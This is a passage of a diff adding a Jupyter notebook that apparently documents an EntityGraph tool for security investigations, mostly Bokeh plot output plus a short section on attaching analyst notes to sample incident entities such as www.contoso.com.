style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='4769', ...)],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='4772', ...), Grid(id='4776', ...), Label(id='4808', ...), Label(id='4809', ...), Label(id='4810', ...), Label(id='4811', ...)],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='4773', ...)],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='4793', ...)],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='4759', ...),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='4784', ...),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='4761', ...),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='4765', ...),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='4763', ...),</div></div><div class=\"5151\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='4767', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"5152\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"5151\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='4758', ...)"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "graph.add_link(\"www.contoso.com\", \"Incident: Sample Incident\")\n",
+    "graph.add_link(\"www.contoso.com\", \"CONTOSO\\\\auser\")\n",
+    "graph.remove_link(\"CONTOSO\\\\auser\", \"Incident: Sample Incident\")\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding Notes\n",
+    "\n",
+    "Entities are not the only elements that you might want to record as part of an investigation. To include a wide range of other items and observations the EntityGraph has the concept of Notes. Notes are nodes in the graph that have free form titles and descriptions, allowing the user to add anything they need - be it a comment on an entity on the graph, or a query used to find an event.\n",
+    "Notes area added with the `add_note` function. As with the `add_entity` function notes can be attached to an existing entity in the graph. In addition, you can adjust the color of the node added to the graph, and add a username associated with the note."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"6016\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"6016\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"6016\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"f3075cff-6098-4bad-b1c8-4c94bddb3b13\" data-root-id=\"6017\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"9a0e79a1-e492-4309-89f5-99a7d9967855\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"6028\"}],\"center\":[{\"id\":\"6031\"},{\"id\":\"6035\"},{\"id\":\"6067\"},{\"id\":\"6068\"},{\"id\":\"6069\"},{\"id\":\"6070\"},{\"id\":\"6071\"}],\"height\":800,\"left\":[{\"id\":\"6032\"}],\"renderers\":[{\"id\":\"6052\"}],\"title\":{\"id\":\"6018\"},\"toolbar\":{\"id\":\"6043\"},\"width\":800,\"x_range\":{\"id\":\"6020\"},\"x_scale\":{\"id\":\"6024\"},\"y_range\":{\"id\":\"6022\"},\"y_scale\":{\"id\":\"6026\"}},\"id\":\"6017\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"6040\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"6057\",\"type\":\"MultiLine\"},{\"attributes\":{},\"id\":\"6037\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"formatter\":{\"id\":\"6348\"},\"major_label_policy\":{\"id\":\"6347\"},\"ticker\":{\"id\":\"6029\"}},\"id\":\"6028\",\"type\":\"LinearAxis\"},{\"attributes\":{\"data_source\":{\"id\":\"6054\"},\"glyph\":{\"id\":\"6062\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"6056\"}},\"id\":\"6055\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"www.contoso.com\",\"This is a note\",\"www.contoso.com\"],\"start\":[\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"CONTOSO\\\\auser\"]},\"selected\":{\"id\":\"6353\"},\"selection_policy\":{\"id\":\"6354\"}},\"id\":\"6058\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"6059\"},\"inspection_policy\":{\"id\":\"6341\"},\"layout_provider\":{\"id\":\"6061\"},\"node_renderer\":{\"id\":\"6055\"},\"selection_policy\":{\"id\":\"6342\"}},\"id\":\"6052\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"green\",\"green\",\"purple\"],\"description\":[\"2021-09-22T15:09:09.2786667Z - Sample Incident - 123\",\"User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']\",null,\"www.contoso.com\",\"Notes allow for free form additions to the graph\"],\"end_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null,null],\"entitytype\":[\"incident\",\"alert\",\"account\",\"url\",null],\"index\":[\"Incident: Sample Incident\",\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\",\"This is a note\"],\"name\":[\"Sample Incident\",\"User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\",\"This is a note\"],\"node_color\":[\"red\",\"orange\",\"green\",\"green\",\"purple\"],\"node_type\":[\"incident\",\"alert\",\"entity\",\"entity\",\"analystnote\"],\"source\":[null,\"{ 'AdditionalData': { 'ID': '8b7d06d8-dbae-4b23-87ed-1a27b75437d5',\\n                      'Name': 'User Added to Priviledged Group in CONTOSO Domain'},\\n  'DisplayName': 'User Added to Priviledged Group in CONTOSO Domain',\\n  'SystemAlertIds': ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5'],\\n  'Type': 'alerts',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DisplayName': 'CONTOSO\\\\\\\\auser',\\n  'IsDomainJoined': False,\\n  'Type': 'account',\\n  'edges': set()}\",\"{'AdditionalData': {}, 'Type': 'url', 'Url': 'www.contoso.com', 'edges': set()}\",null],\"start_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null,null],\"time_generated\":[\"2021-09-22T15:09:09.2786667Z\",null,null,null,1633511135203.6992],\"user\":[null,null,null,null,\"Analyst\"]},\"selected\":{\"id\":\"6351\"},\"selection_policy\":{\"id\":\"6352\"}},\"id\":\"6054\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"6054\"}},\"id\":\"6056\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"6041\",\"type\":\"HelpTool\"},{\"attributes\":{\"text\":\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"text_font_size\":\"10pt\",\"x\":0.9177961022982826,\"x_offset\":5,\"y\":1.2870327132688901,\"y_offset\":5},\"id\":\"6068\",\"type\":\"Label\"},{\"attributes\":{\"graph_layout\":{\"Alert: User Added to Priviledged Group in CONTOSO Domain\":[0.9177961022982826,1.2870327132688901],\"CONTOSO\\\\auser\":[-2.0,-0.6667110786659408],\"Incident: Sample Incident\":[0.4591238220909722,0.15657687078915353],\"This is a note\":[1.4932516813324899,-0.4896693052716502],\"www.contoso.com\":[-0.870171605721745,-0.2872292001204533]}},\"id\":\"6061\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{\"formatter\":{\"id\":\"6335\"},\"major_label_policy\":{\"id\":\"6334\"},\"ticker\":{\"id\":\"6033\"}},\"id\":\"6032\",\"type\":\"LinearAxis\"},{\"attributes\":{\"data_source\":{\"id\":\"6058\"},\"glyph\":{\"id\":\"6057\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"6060\"}},\"id\":\"6059\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"6353\",\"type\":\"Selection\"},{\"attributes\":{\"source\":{\"id\":\"6058\"}},\"id\":\"6060\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"6029\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"6354\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"www.contoso.com\",\"text_font_size\":\"10pt\",\"x\":-0.870171605721745,\"x_offset\":5,\"y\":-0.2872292001204533,\"y_offset\":5},\"id\":\"6070\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"6033\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"6026\",\"type\":\"LinearScale\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"6022\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"6347\",\"type\":\"AllLabels\"},{\"attributes\":{\"text\":\"CONTOSO\\\\auser\",\"text_font_size\":\"10pt\",\"x\":-2.0,\"x_offset\":5,\"y\":-0.6667110786659408,\"y_offset\":5},\"id\":\"6069\",\"type\":\"Label\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"6042\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"6341\",\"type\":\"NodesOnly\"},{\"attributes\":{\"text\":\"Incident: Sample Incident\",\"text_font_size\":\"10pt\",\"x\":0.4591238220909722,\"x_offset\":5,\"y\":0.15657687078915353,\"y_offset\":5},\"id\":\"6067\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"This is a 